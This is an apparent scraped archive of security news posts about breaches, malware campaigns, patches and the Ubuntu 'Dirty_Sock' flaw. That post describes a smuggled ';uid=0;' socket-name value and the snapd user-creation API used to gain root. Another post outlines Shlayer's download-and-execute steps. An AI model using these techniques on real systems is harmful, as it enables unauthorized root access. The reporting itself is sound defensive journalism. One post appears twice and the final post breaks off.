Category Archives: Pierluigi Paganini

Russia is going to disconnect from the internet as part of a planned test

Russia plans to disconnect the country from the internet as part of an experiment aimed at testing the response to cyber attacks that should isolate it.

Russia plans to conduct the country from the Internet for a limited period of time to conduct a test aimed at assessing the security of its infrastructure. Russian citizens will be able to reach only Internet resources within the national territory, any other only resource hosted outside the country will be not reachable.

The news was reported by the Russian news agency RosBiznesKonsalting (RBK), the experiment could be conducted before April 1st.

According to the “The National Digital Economy Program” bill submitted to Parliament in 2018, Russian Internet service providers (ISPs) should ensure operations even if nation-state actors carry out cyber attacks to isolate Russia from the Internet. The authorities want to ensure that the access to Russian Internet resources will be maintained also under attack, to do this, Russian experts are thinking a sort of DNS managed by Moscow.

Currently, among the 12 organizations that oversee DNS base servers worldwide where isn’t an entity in Russia.

ISPs should be able to route traffic through nodes under the control of the Russian Government to allow the connections between Russians entities.

Of course, the concentration of the traffic through nodes controlled by Moscow could open the door to a massive surveillance

“In addition, Russian telecom firms would also have to install “technical means” to re-route all Russian internet traffic to exchange points approved or managed by Roskomnazor, Russia’s telecom watchdog.” reported ZDNet.

“Roskomnazor will inspect the traffic to block prohibited content and make sure traffic between Russian users stays inside the country, and is not re-routed uselessly through servers abroad, where it could be intercepted.”

Russia

The experiment has been agreed in a session of the Information Security Working Group at the end of January. The Group includes InfoWatch, MegaFon, Beeline, MTS, RosTelecom, and other major companies in the country.

All internet providers agreed with the law’s goals, but the technical implementation raises many concerns bacause experts believe it could cause major disruptions to Russian internet traffic. Anyway the goal of the project it to observe the way ISPs networks would react in this scenario.

“Natalya Kaspersky [President InfoWatch company] confirmed to RBC that at the meeting of the working group, a bill was discussed on the sustainability of the Runet for external shutdown.” reported RBK agency,

“All participants in the discussion agree that he has good goals, but the mechanisms for its implementation raise many questions and disputes. Moreover, the methods of its implementation have not yet been precisely defined. Therefore, they came to the conclusion that market participants need to organize exercises or something similar in order to understand how this can all be implemented in practice” said Kaspersky.

According to Finanz.ru, local internet services Mail.ru and Yandex.ru were also supportive of the test.

Pierluigi Paganini

(SecurityAffairs – Russia, Internet)

The post Russia is going to disconnect from the internet as part of a planned test appeared first on Security Affairs.

A new batch of 127 million records appears in the dark web

A new batch of 127 million records appears in the dark web, this time the huge trove of data appears to be originated from eight companies.

A hacker that goes online with the moniker ‘gnosticplayers‘ is offering for sale the data on the Dream Market marketplace asking $14,500 worth of Bitcoin.

dark web data leak

Early this week, the same seller also listed another batch of 620 million accounts coming from other 16 breached websites including Dubsmash, Armor Games, 500px, Whitepages, and ShareThis.

Like the previous round, the latest 127 million records of stolen data have now been removed from the marketplace to avoid uncontrolled diffusion of the archive that were purchased by many buyers.

“All my listings have been removed, to avoid them being bought so many times and being leaked, as a respect for my buyers. But don’t worry, next round of breaches coming soon.” explained the seller in a message left on the black marketplace.

Below the list of companies whose records are included in the second collection offered for sale in the dark web by the seller gnosticplayers:

Ge.tt (1.56GB) (1.83 million accounts – BTC 0.1609 ($572)) – Exposed data includes name, password hash, Facebook ID, and referrer. Data were stolen in December 2017.

Ixigo (7.23GB) (18 million accounts – BTC 0.263 ($936)) – Exèposed data include passwords md5, full name, IP address, username, email addresses, and some passport numbers. Data were stolen in January 2019.

Roll20 (759 MB) (4 million accounts – BTC 0.0585 ($208)) – Exposed data include names, encrypted passwords, email addresses, and more.
Data were stolen in January 2019.

Houzz (7.9GB) (57 million accounts – BTC 2.927 ($10400)) – Exposed data include email addresses, passwords, name, and registration date.
D
ata were stolen in July 2018.

Coinmama (101MB) (486,297 accounts – BTC 0.351 ($1248)) – Exposed data include email addresses, passwords, and more.
Data were stolen in August 2017.

YouNow (1.3GB) (40 million accounts – BTC 0.1317 ($468)) – Exposed data include full names, IP addresses, email addresses, and social profiles.
Data were stolen in October 2017.

Stronghold Kingdoms (610MB) (5 million accounts – BTC 0.2927 ($1040) – Exposed data include full names, IP addresses, email addresses, and social profiles. Data were stolen in September 2018.

PetFlow (200MB) (1 million accounts – BTC 0.1769 ($634.4) – BTC 0.2927 ($1040) – Exposed data include full names, IP addresses, email addresses, and social profiles. Data were stolen in 2017.

Gnosticplayers in an exclusive conversation with HACKREAD claimed to be a Pakistani citizen, a hacktivist fighting to put a positive image of his country.

“The message is clear, the image the world has of Pakistan is unfair Whereas Pakistani people are the most wonderful people and did nothing wrong. They are persecuted all over the world and people tend to associate this with the whole country. this is false,” Gnosticplayers told HackRead.

The hackers already made available for sale 24 collections containing a total of 747 million stolen user credentials.

At the time of writing, only Coffee Meets Bagel, Coinmama, Houzz disclosed data breaches, while YouNow and
PetFlow claimed that they haven’t suffered a security breach.

Pierluigi Paganini

(SecurityAffairs – data breaches, dark web)

The post A new batch of 127 million records appears in the dark web appeared first on Security Affairs.

Astaroth Trojan relies on legitimate os and antivirus processes to steal data

A new Astaroth Trojan campaign was spotted by the Cybereason’s Nocturnus team, hackers are targeting Brazil and European countries.

Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.

“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as keystate information and clipboard usage.” reads the analysis published by Cybereason.

The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effecting in evading antivirus software. 

The new stain analyzed by Cybereason leverages the BITSAdmin and the WMIC utilities to connect the command and control infrastructure and download malicious payload. 

The BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.

This Astaroth Trojan is distributed through spam campaigns, malicious messages use a .7zip file as an attachment or include a hyperlink that points to the archive.

The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”

The malware uses the BITSAdmin to fetch a payload from another Command and Control server, this malicious code is obfuscated as images or files without extensions and contains various Astaroth modules.

Astaroth Trojan

The malware also injects a malicious module in the aswrundll.exe Avast Software Runtime Dynamic Link Library used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.

The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither injection nor a privilege escalation, attackers are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. Avast had issued a detection for the malware and plan to implement changes to their environment to ensure the same process cannot be misused in this way the future.

The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.

The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitoring the keystate.

The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords of mail accounts on an exchange server stored by Microsoft Outlook, and passwords of MSN Messenger and Windows Messenger accounts.

“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.

“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”

Pierluigi Paganini

(SecurityAffairs – Astaroth Trojan, hacking)

The post Astaroth Trojan relies on legitimate os and antivirus processes to steal data appeared first on Security Affairs.

Group-IB helped to arrest phone scammers profiting off the backs of the Russian elderly

Moscow police department operatives, with the participation of Group-IB experts, took down a group of phone scammers who for several years have been extorting money from the elderly.

Phone scammers typically managed to steal between 450 and 4500 USD per victim, promising substantial compensation for their purchases of medicines, medical devices or dietary supplements. According to the investigation, in just 7 situations of fraudulent events in the investigation, the damage is estimated to be 150 000 USD, and the police believe that the number of victims is much higher.

At the end of 2018, employees of the Moscow Department of Internal Affairs came across the trail of a group of telephone scammers who had long been involved in fraud, extracting large sums of money from Russian elderly people. The money was used to purchase real estate, cars, collectors’ coins, jewellery and securities. According to the investigation, the scheme was invented and conducted by a 35-year-old resident of Domodedovo originally from the Republic of Azerbaijan. In addition to the leader, the group was made up of “callers” who communicated with pensioners over the phone, “cashiers” who controlled transactions, “money mules” who withdrew cash from ATMs, and even a dedicated person responsible for the relevance and security of the database of phone numbers of potential victims.

Where did the phone scammers get this data from? They profited from a scam, popular some time before, which sold “magic pills” — counterfeit drugs and dietary supplements purported to cure even serious chronic diseases. This scam’s elderly victims spent hundreds and thousands of dollars on the products, borrowing from friends and taking loans. The database of these names, phone numbers and the cost of the “drugs” ordered was in the hands of phone scammers. According to Group-IB experts, the list held the names of about 1,500 pensioners, their phone numbers, and the names and prices of the medicines they trustingly purchased. Judging by the database, these potential victims were between the ages of 70 and 84, and were from Moscow, Rostov, Tomsk, Nizhny Novgorod, Leningrad, Chelyabinsk, Orenburg and other regions. They had at different times bought expensive drugs, including: “Weian capsules” (2287 USD), “Flollrode aqueous” (1600 USD), “Miracle patches” (313 USD), applicators (170 USD), “Lun Jiang” (157 USD), and “Black nut” (388 USD). 

For those who were suspicious of the compensation process, the “prosecutor of Moscow” offered to clarify the information from the “head of the financial department of a bank” clarify the information. After that, the victim was contacted by another person — “a representative of a credit and financial organization” — who confirmed his willingness to transfer compensation to the pensioner’s account or to transfer the money in cash. When the victim agreed, “tax officers” entered into negotiations and reported that the victim needed to make an advance payment of 15% of the compensation as a tax. In addition, the scammers were able to collect an “insurance premium” or “lawyer’s tax”.

For example, one of the pensioners, who was promised a compensation of 8660 USD, was required to pay a tax of 747 USD. In another case, a request for compensation of 448 USD was made for the receipt of 4480 USD. One of the victims was a famous opera singer who paid the scammers about 4480 USD. The elderly people transferred the money to the cards of cashiers — “drops” or “money mules” — indicated by the attackers, who then withdrew the money from ATMs. 

“Despite the fact that vishing (voice phishing) is a rather old type of phone fraud, it maintains popular to the fact that attackers come up with new methods of deception, targeted at the most vulnerable segments of the population — pensioners, — highlights Sergey  Lupanin, Head of the Group-IB Investigation Department. For years, deceived elderly people have repeatedly complained about telephone scams to the Russian Central Bank, the Ministry of Finance and the Prosecutor’s Office, and regulatory and law enforcement agencies have periodically issued warnings about these dangerous and very cynical fraudulent schemes, but the number of victims did not decrease. The scammers not only maintained secrecy but also improved their methods of social engineering: they quickly gained their victims’ trust, showed themselves to be intelligent and educated, and were persistent and aggressive. It’s rare for one of their victims to escape unscathed.”

phone scammers
Source: The Express

However, as the result of a large-scale police operation, the organized criminal group was defeated: on 5 February, several detentions and searches were carried out at the criminals’ place of residence. A police search of the apartment of the scheme’s organizer turned up large sums of money in roubles and other currencies, bank cards, a traumatic gun, a hunting rifle and collectible coins. The scammer invested the money received in shares of Russian companies. In his stash inside a toilet, field investigators found database printouts with names of pensioners as well as extracts with phone numbers and names of victims that the criminal’s girlfriend had tried to flush. In a private house belonging to another detainee — the leader of the money mules — a police search turned up bank cards, databases of pensioners, accounting of criminal activity, money, and jewellery.

A total of seven people were detained. According to the investigation, the damages from 7 episodes of fraud are estimated at 150 000 USD, but operatives believe that the number of victims is much higher — at least 30 people. An investigation is underway.

About the author: Group-IB Group-IB is one of the leading providers of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – phone scammers, cybercrime)

The post Group-IB helped to arrest phone scammers profiting off the backs of the Russian elderly appeared first on Security Affairs.

Coffee Meets Bagel dating app confirms data breach

The week closes with the news of another embarrassing data breach, the Coffee Meets Bagel confirmed a hack on Valentine’s Day.

The dating app Coffee Meets Bagel confirmed that hackers breached its systems on Valentine’s Day and may have obtained access to users’ account data.

The company notified the incident to account holders, the intrusion was discovered after an archive containing user data was offered for sale on the dark web for roughly $20,000 worth of Bitcoin,

Early this week, the Register revealed in exclusive that some 617 million online account details stolen from 16 hacked websites are available for sale on the dark web. Coffee Meets Bagel learned of the incident on Feb. 11, 2019.

The advertising for the sale of the huge trove of data was published in the popular Dream Market black marketplace, data are available for less than $20,000 worth of Bitcoin.

Data was collected from data breaches of popular websites including:

  • Dubsmash (162 million);
  • MyFitnessPal (151 million);
  • MyHeritage (92 million);
  • ShareThis (41 million);
  • HauteLook (28 million);
  • Animoto (25 million);
  • EyeEm (22 million);
  • 8fit (20 million);
  • Whitepages (18 million);
  • Fotolog (16 million);
  • 500px (15 million);
  • Armor Games (11 million);
  • BookMate (8 million);
  • CoffeeMeetsBagel (6 million);
  • Artsy (1 million);
  • DataCamp (700,000).

While some of the above websites are known to have been hacked (i.e. MyHeritage, MyFitnessPal) for some of them, including Coffee Meets Bagel, it is the first time that the security community was informed of their breaches.

Journalists at The Register have analyzed account records and confirmed they appear to be legit. Spokespersons for MyHeritage and 500px confirmed the authenticity of the data.

The Register report alleges that data belonging to 6.17 million Coffee Meets Bagel accounts (673 MB of data) were offered for sale. Data appears to be related to late 2017 and mid-2018.

“As always, we recommend you take extra caution against any unsolicited communications that ask you for your personal data or refer you to a web page asking for personal data,” reads the email sent to the users. “We also recommend avoiding clicking on links or downloading attachments from suspicious emails.” reads an email sent by the company to the users.

Stolen records include name, email address, age, registration date, and gender, but data breach notification issued by Coffee Meets Bagel only reports that names and email addresses prior to May 2018 were exposed.

According to the company, no financial data were exposed because the company doesn’t store it.

Coffee Meets Bagel hired a forensic firm to investigate the incident and assess its systems, at the time it is not clear how hackers have breached the company, it also started the audit of vendor and external systems.

Pierluigi Paganini

(SecurityAffairs – Coffee Meets Bagel , hacking)

The post Coffee Meets Bagel dating app confirms data breach appeared first on Security Affairs.

Germany makes its cyber capabilities available for NATO alliance

Germany announced it is going to make its cyber capabilities available for the NATO alliance to help fight hacking and electronic warfare.

Germany is going to share its cyber warfare capabilities with the NATO alliance to protect members of the alliance against hacking and electronic warfare.

During the 2016 Warsaw Summit, NATO officially recognised cyberspace as a military operational domain. This means that the NATO alliance will respond with conventional weapons in case of a severe cyber attack confirming that the Internet is a new battlefield.
Each Ally is committed to improving its resilience to cyber attacks and the ability to promptly respond to cyber attacks, including in hybrid contexts. The Alliance aims to expand the scope of the NATO Cyber Range to allow allies in improving cyber capabilities and information sharing on threat and best practices.

NATO fears both nation-state hacking and attacks carried out by cyber criminals, their activities are becoming even more intense and urge a proper response from the alliance.

“NATO has designated cyberspace as a conflict domain alongside land, sea and air and says electronic attacks by the likes of Russia and China — but also criminals and so-called “hacktivists” — are becoming more frequent and more destructive.” reads a post published by AFP press.

NATO alliance

During a meeting of defence ministers held in Brussels on Thursday, Germany told allies that it would make both its defensive and offensive cyber capabilities available.

“Just as we provide army, air force and naval forces to NATO, we are now also in a position to provide NATO capabilities on the issue of cyber within the national and legal framework that we have,” German Defence Minister Ursula von der Leyen said.

Germany is not alone, the US, Britain, Denmark, the Netherlands and Estonia have all announced the availability of their offensive cyber capabilities to the alliance.

NATO members hope that the announcement of the sharing for offensive capabilities would work as a deterrent for threat actors.

Members of the alliance that already share conventional military means, aims to share their cyber capabilities for NATO missions and operations.

Potential targets of these operations can include any connected system, ranging from computers and mobile devices, to ICS systems in critical infrastructure.

“In a sign of the growing importance NATO countries attach to the cyber battlefield, this year Britain said it would spend 65 million pounds (74 million euros/$83 million) on offensive capabilities.” concludes AFP.

Pierluigi Paganini

(SecurityAffairs – NATO alliance, Germany)

The post Germany makes its cyber capabilities available for NATO alliance appeared first on Security Affairs.

Experts spotted a new strain of Shlayer macOS Malware

Security experts at Carbon Black have recently discovered a new strain of the Shlayer malware that targets macOS versions.

Security experts at Carbon Black have recently spotted a new strain of the Shlayer malware that targets MacOS versions from 10.10.5 up to 10.14.3.

The malware poses as an Adobe Flash update it was distributed through a large number of websites, fake or compromised legitimate domains.

Shlayer macOS Malware

“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.

“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites.”

This variant of the Shlayer malware employs multiple levels of obfuscation, experts discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware uses legitimate system applications via bash to conduct all installation activity.

Once the installer is launched, a .command script is executed from a hidden directory in the mounted volume. The script in base64 is decoded and AES decrypted revealing a second script that contains another encoded script that is subsequently executed.

The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using uuidgen, creates a custom URL using the harvested data, and then downloads the second stage payload. 

The malicious script attempts to download the password-protected ZIP file using curl, and creates a directory in /tmp to store the ZIP file and unzip it. 

The script also makes the binary within the unzipped .app executable using chmod +x, then it runs the payload using specific arguments, and then performs a killall Terminal to kill the running script’s terminal window.

The second stage malware attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline

“After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline as discussed in Patrick Wardle’s DEFCON 2017 talk “Death by 1000 Installers”.” continues the analysis.

“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl.”

With this technique it is possible to run whitelisted software without user intervention even if the system is set to disallow unknown applications downloaded from the internet. 

Carbon Black’s analysis includes Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Experts spotted a new strain of Shlayer macOS Malware appeared first on Security Affairs.

SAP security fixes address Critical flaw in SAP HANA XSA

SAP released a collection of security fixes for February 2019 that address 13 vulnerabilities in its products, including a Hot News flaw in SAP HANA XSA.

This week SAP addressed 13 vulnerabilities in its products with the released of the February 2019 set of security fixes, including a Hot News flaw in SAP HANA Extended Application Services (XSA), advanced model.

SAP Security Patch Day for February 2019 includes 13 Security Notes and 3 updates to previously released security notes. 2 Notes are rated Hot News, 4 rated High priority, and 10 rated Medium priority.

“On 12th of February 2019, SAP Security Patch Day saw the release of 13 Security Notes. Additionally, there were 3 updates to previously released security notes.” reads the advisory published by SAP.

The fixes address flaw in the following SAP products: Business Client, HANA XSA, ABAP Platform (SLD Registration), Disclosure Management, Solution Tools Plug-In (ST-PI), Note Assistant, Business Objects, Manufacturing Integration and Intelligence, Business One Mobile Android App, and WebIntelligence BILaunchPad (Enterprise).

The most severe issue is a Hot News Notes (CVSS score of 9.8) that updates a Security Note released on April 2018 Patch Day and that includes security updates for the browser control Chromium delivered with SAP Business Client. 

“As mentioned, one of the two SAP Security Notes tagged as HotNews (#2742027) affects SAP HANA XSA (the other one is #2622660 that is regularly updated with Chromium security updates and was explained in a previous blog post). It is a classic Missing Authorization Check that may allow an attacker not only to read/modify/delete sensitive information, but also to gain high-privileged functionalities.” reads the analysis published by Onapsys.

“It affects XS Advanced selected versions in both SAP HANA 1 and SAP HANA 2 and can be patched by upgrading the XS Advanced component.”

The security updates include a Hot News Note for HANA XSA that addresses a missing authentication check that could be exploited by an attacker to gain access to high-privileged functionalities, including the ability to be able to read, modify, or delete sensitive information. 

The security vulnerability affects XS Advanced selected versions in SAP HANA 1 and SAP HANA 2.

To address the flaw, customers should upgrade the XS Advanced component. SAP also provided a workaround that consists of disabling the component, if not in use. 

The SAP Security Patch Day for February 2019 also addressed another issue in SAP HANA XSA that could lead Information Disclosure, it was rated Medium severity (CVSS score of 6.8). 

SAP addressed several High priority Security Notes including an XML External Entity (XXE) vulnerability in SLD Registration of ABAP Platform, Missing Authorization check in Disclosure Management, and access to Easy Access Menu in ABAP Platform. 

SAP also issued an update to a security note released on November 2014 Patch Day, a potential information disclosure relating to database server file system.

Below there is a summary, published by Onapsis, of the type of vulnerabilities that were addressed in February, including another six that were published in late January, after that month’s Security Notes Patch Day.

SAP HANA february

Pierluigi Paganini

(SecurityAffairs – SAP HANA, security)

The post SAP security fixes address Critical flaw in SAP HANA XSA appeared first on Security Affairs.

Bank of Valletta shut down its operations after a cyber attack

Bank of Valletta, the largest bank of Malta was hit by a cyber attack, attackers attempted to steal 13 million euros ($14.7 million).


Bank of Valletta the largest bank in Malta that accounts for almost half of banking transactions in the country, had to shut down its operations on Wednesday after hackers attempted to withdraw 13 million euros ($14.7 million).

The news was confirmed by Prime Minister Joseph Muscat, hackers broke into the systems of the bank and transfer the funds overseas.
Muscat told parliament that threat actors attempted to transfer funds to banks in the Czech Republic, Hong Kong, Britain, and the US.

“The reason for my statement is to put people’s minds at rest that their money is safe in the bank,” Muscat insisted, adding that BOV was an important cog for the Maltese economy.”

“It is no joke having a bank that controls half the economy shut down for a whole business day but at this stage caution trumped every other consideration,”

Bank of Valletta

The Government of Malta is the largest shareholder of the Bank of Valletta, the financial institution shut down its systems, closed branches and ATMs, and suspended mobile and Internet banking and internal email.

After the disclosure of the attack, the website of the bank also went offline.

“Prime Minister Joseph Muscat told parliament the cyber attack involved the creation of false international payments totaling 13 million euros ($14.7 million) to banks in Britain, the United States, the Czech Republic and Hong Kong.” reported the Reuters.

“The funds have been traced and the Bank of Valletta is seeking to have the fraudulent transactions reversed.”

The customer accounts were not affected and the services will be restored as soon as possible.

The authorities were able to trace the transactions and reverse them.

The Bank is working with local and international police authorities to investigate in the case.

During routine reconciliations that the Bank carries out regularly it was noticed that there were discrepancies in eleven payments having a total value of around EUR 13 million emanating from the Bank’s foreign payment accounts.  The Bank took immediate steps to address this issue by requesting the international banks involved to stop these payments,” the bank said in a statement reported by MaltaToday.

Pierluigi Paganini

(SecurityAffairs – Bank of Valletta, hacking)

The post Bank of Valletta shut down its operations after a cyber attack appeared first on Security Affairs.

0patch released micropatch for code execution flaw in OpenOffice

Experts at ACROS Security’s 0patch released an unofficial patch for a recently disclosed remote code execution vulnerability in the Apache OpenOffice suite.

ACROS Security’s 0patch released an unofficial patch for a path traversal flaw recently disclosed in the Apache OpenOffice suite.

The security researcher Alex Inführ discovered a severe remote code execution vulnerability in LibreOffice and Apache OpenOffice that could be exploited by tricking victims into opening an ODT (OpenDocument Text) file embedding an event embedded.

“I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file and moves his mouse over the document, without triggering any warning dialog.” reads the blog post published by Inführ.

The flaw could have a huge impact because the popular free, open source office suite is used by millions of Windows, MacOS and Linux users.

Libre Office OpenOffice

The expert discovered that it is possible to abuse the OpenDocument scripting framework by adding an onmouseoverevent to a link included in the ODT file.

Inführ devised an attack that relies on exploiting a directory traversal vulnerability tracked as CVE-2018-16858. By exploiting the vulnerability it is possible to trigger the automatic execution of a specific python library included in the suite using a hidden onmouseover event.

Even if OpenOffice developers still haven’t released a fix for the issue, 0patch experts have released an unofficial patch to address this flaw. The micropatch can be applied to the latest version of OpenOffice for Windows.

Researchers also released patches for LibreOffice as well.

0patch also published a video PoC that shows the exploitation of the vulnerability.

This is the second time in a few days that 0patch released an unofficial patch,  this week 0patch experts released a micropatch to address an Adobe Reader zero-day that allows maliciously PDF docs to call home and send over the victim’s NTLM hash.

Pierluigi Paganini

(SecurityAffairs – micropatch, hacking)

The post 0patch released micropatch for code execution flaw in OpenOffice appeared first on Security Affairs.

Ubuntu snapd flaw allows getting root access to the system.

Expert discovered a privilege escalation vulnerability in default installations of Ubuntu Linux that resides in the snapd API.

Security researcher Chris Moberly discovered a vulnerability in the REST API for Canonical’s snapd daemon that could allow attackers to gain root access on Linux machines.

Canonical, the makers of Ubuntu Linux, promotes their “Snap” packages to roll all application dependencies into a single binary (similar to Windows applications).

The Snap environment includes an “app store” where developers can contribute and maintain ready-to-go packages.

“Management of locally installed snaps and communication with this online store are partially handled by a systemd service called snapd.”

The flaw called ‘Dirty_Sock’ would affect affects several Linux servers, the expert successfully tested on Ubuntu and released PoCs to show how to elevate privileges.

“In January 2019, I discovered a privilege escalation vulnerability in default installations of Ubuntu Linux. This was due to a bug in the snapd API, a default service. Any local user could exploit this vulnerability to obtain immediate root access to the system.” wrote the expert.

“Two working exploits are provided in the dirty_sock repository:

  1. dirty_sockv1: Uses the ‘create-user’ API to create a local user based on details queried from the Ubuntu SSO.
  2. dirty_sockv2: Sideloads a snap that contains an install-hook that generates a new local user.”

“Both are effective on default installations of Ubuntu.”

Canonical has already addressed the flaw, administrators need to install the snapd update to avoid the exploitation.

“Chris Moberly discovered that snapd versions 2.28 through 2.37 incorrectly validated and parsed the remote socket address when performing access controls on its UNIX socket.” reads the security advisory published by Canonical.

“A local attacker could use this to access privileged socket APIs and obtain administrator privileges. On Ubuntu systems with snaps installed, snapd typically will have already automatically refreshed itself to snapd 2.37.1 which is unaffected.”

Moberly discovered that the daemon leverages UNIX sockets to allow developers to communicate with it using a REST API.

This UNIX socket runs under the security context of the root user, so the expert investigated the possibility to elevate his privileges by abusing API methods.

The researcher discovered that it is possible to create a local user account using the daemon’s “POST /v2/create-user” API. This API command requires the program to have root permission to create a user.

The analysis of snapd connections allowed the expert to discover that if a user has root permissions, it uses a string composed of the calling pid, uid of the program connected to the socket, the socket path, and the remoteAdd (i.e. “pid=5127;uid=1000;socket=/run/snapd.socket;@”).

Where the @ substring represents the RemoteAddr of the socket, or the socket name that is used to connect to the snapd socket.

Moberly created a socket containing ;uid=0; in its name in a way to trick the parser to overwrite the uid when the string is analyzed.

snapd socket-via-remote-socket

Parsing a string containing the uid=0 is the last part will allow overwriting the previous uid and trick snapd into emulating a root user and allow a local user to be created.

The expert published the “dirty_sockv1” PoC code for this attack, but he pointed out that the attack required an Internet connection and the creation of an account on the Ubuntu SSO and uploading an SSH public key to your profile.

The expert also devised a Dirty_Sock version 2 that sees sideloads a malicious snap using the ‘POST /v2/snaps’ API instead.

dirty_sockv2 instead uses the ‘POST /v2/snaps’ API to sideload a snap containing a bash script that will add a local user. This works on systems that do not have the SSH service running. It also works on newer Ubuntu versions with no Internet connection at all.” continues the expert.

“HOWEVER, sideloading does require some core snap pieces to be there. If they are not there, this exploit may trigger an update of the snapd service.”

The Dirty_Sock version 2 requires no Internet connection or the use of SSH key.

Canonical fixed the issue with the release of the 2.37.1. version that implements a stricter parser that removes user-controlled variable.

Pierluigi Paganini

(SecurityAffairs – Snapd, Ubuntu)

The post Ubuntu snapd flaw allows getting root access to the system. appeared first on Security Affairs.

Security Affairs: Malicious PDF Analysis

In the last few days I have done some analysis on malicious documents, especially PDF. Then I thought, “Why not turn a PDF analysis into an article?”

Let’s go to our case study:

I received a scan request for a PDF file that was reported to support an antivirus vendor, and it replied that the file was not malicious. Because the manufacturer’s analysis was not satisfactory, the team responsible for handling the incident requested a second opinion, since in other anti-virus tools the document was reported to be malicious. The team needed evidence to prove the risk involved in the file.

While conducting an initial analysis on the file, I identified that I had something suspicious:

After an analysis in the structure of objects of the PDF it is possible to identify a malicious URL that is executed during the process of opening the document, that is to say, when the user opens the file in his station it executes of conceal form the call of the URL as shown below :

When performing a domain verification it is possible to reach the IP bound to it:

When performing a URL reputation analysis, a malicious history is identified:

When performing an IP reputation analysis, a malicious history is identified:

The interesting thing is to think that years ago we would never say that infection would be possible through malicious code, URL, shellcode, through obfuscation inside documents like PDF, DOC, DOCx, XLS, XLSx and PPT. Most security tools must always be adapted to this new reality of attack and infection.

It is essential that security professionals are increasingly able to work with this type of analysis that the antivirus tool is not usually able to do, I leave here the hint about the importance of studying malicious document analysis.

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – PDF analysis, hacking)

The post Malicious PDF Analysis appeared first on Security Affairs.



Security Affairs

Malicious PDF Analysis

In the last few days I have done some analysis on malicious documents, especially PDF. Then I thought, “Why not turn a PDF analysis into an article?”

Let’s go to our case study:

I received a scan request for a PDF file that was reported to support an antivirus vendor, and it replied that the file was not malicious. Because the manufacturer’s analysis was not satisfactory, the team responsible for handling the incident requested a second opinion, since in other anti-virus tools the document was reported to be malicious. The team needed evidence to prove the risk involved in the file.

While conducting an initial analysis on the file, I identified that I had something suspicious:

After an analysis in the structure of objects of the PDF it is possible to identify a malicious URL that is executed during the process of opening the document, that is to say, when the user opens the file in his station it executes of conceal form the call of the URL as shown below :

When performing a domain verification it is possible to reach the IP bound to it:

When performing a URL reputation analysis, a malicious history is identified:

When performing an IP reputation analysis, a malicious history is identified:

The interesting thing is to think that years ago we would never say that infection would be possible through malicious code, URL, shellcode, through obfuscation inside documents like PDF, DOC, DOCx, XLS, XLSx and PPT. Most security tools must always be adapted to this new reality of attack and infection.

It is essential that security professionals are increasingly able to work with this type of analysis that the antivirus tool is not usually able to do, I leave here the hint about the importance of studying malicious document analysis.

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – PDF analysis, hacking)

The post Malicious PDF Analysis appeared first on Security Affairs.

Hacker deleted all data from VFEmail Servers, including backups

A destructive cyberattack hit the email provider VFEmail, a hacker wiped its servers in the United States, including the backup systems. 

An unknown attacker has launched a destructive cyber attack against the email provider VFEmail, he erased information on its server including backups, 18 years’ worth of customer emails were lost.

“We have suffered catastrophic destruction at the hands of a hacker. This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can,” reads the statement published by the company on its website.

On Monday, the email provider confirmed that their systems in multiple datacenters were down after a hacker started formatting them.
The company caught the hacker while he was formatting a backup server hosted in the Netherlands. Unfortunately, by that time, the hacker had already managed to erase all disks on every other VFEmail server. 

The hacker destroyed all virtual machines even if the company pointed out that they did not share the same authentication. 

“This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail said. 

The hacker appears to have been attacking out of Bulgaria.

VFEmail

Of course the attacker could have been using a VPN to hide its real origin.,

